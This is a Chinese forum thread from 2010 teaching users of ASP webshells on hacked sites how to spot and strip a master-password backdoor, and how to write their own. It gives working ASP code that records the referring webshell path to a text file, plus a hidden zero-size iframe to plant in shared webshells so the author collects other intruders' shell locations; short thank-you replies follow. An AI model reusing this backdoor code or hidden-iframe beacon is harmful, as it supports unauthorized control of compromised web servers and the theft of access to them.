教你找asp木马后门和写asp木马后门

社区服务
高级搜索
猴岛论坛电脑百科教你找asp木马后门和写asp木马后门
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
5个回复

[资源分享]教你找asp木马后门和写asp木马后门

楼层直达
不懂也不知道

ZxID:10586231

等级: 禁止发言

举报 只看楼主 使用道具 楼主   发表于: 2010-07-07 0
教你找asp木马后门和写asp木马后门
我等小菜自己写不来asp马,只能用大虾写的,但网上流传的都不知道是几手的了

难免有些居心不良的人会在里面加后门。

好不容易拿到个shell又被别人偷走了怎么甘心啊!

所以在下完asp木马后要先检查有没后门,

通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具

解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录

正常的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

加有万能密码的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>

找到后删了,到此asp后门就算剔除了!


下面教大家后门的原理:

这是一段收信的asp代码将其保存为1.asp

<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>

代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

然后里用

<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>

插到asp木马中

那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了
本帖de评分: 1 条评分 DB +4
DB+4

电脑板块欢迎你

iphone丶≈

ZxID:11670762

等级: 禁止发言

举报 只看该作者 5楼  发表于: 2010-07-07 0
不错哦,
风若晨曦

ZxID:8842179

等级: 元老
一念轮回,君千殇

举报 只看该作者 4楼  发表于: 2010-07-07 0
我很赞同

给我一个机会,我还你一个奇迹

-旺崽牛奶

ZxID:10476499

等级: 中将
水贴年年有.....今年特别多..查水哥..B宝

举报 只看该作者 地板   发表于: 2010-07-07 0
谢谢分享
QQ:872554370
゛蝣蕩啲龍っ

ZxID:7865773

等级: 元老
‘燕鸥’是种水鸟,听说,它们会从几千里外,飞回自己的家,而且,是‘情有独钟’,终身不换伴侣 ..

举报 只看该作者 板凳   发表于: 2010-07-07 0
谢谢分享。
╱╳灬小熊ゞ

ZxID:9189876

等级: 大将

举报 只看该作者 沙发   发表于: 2010-07-07 0
感谢分享、


« 返回列表
发帖 回复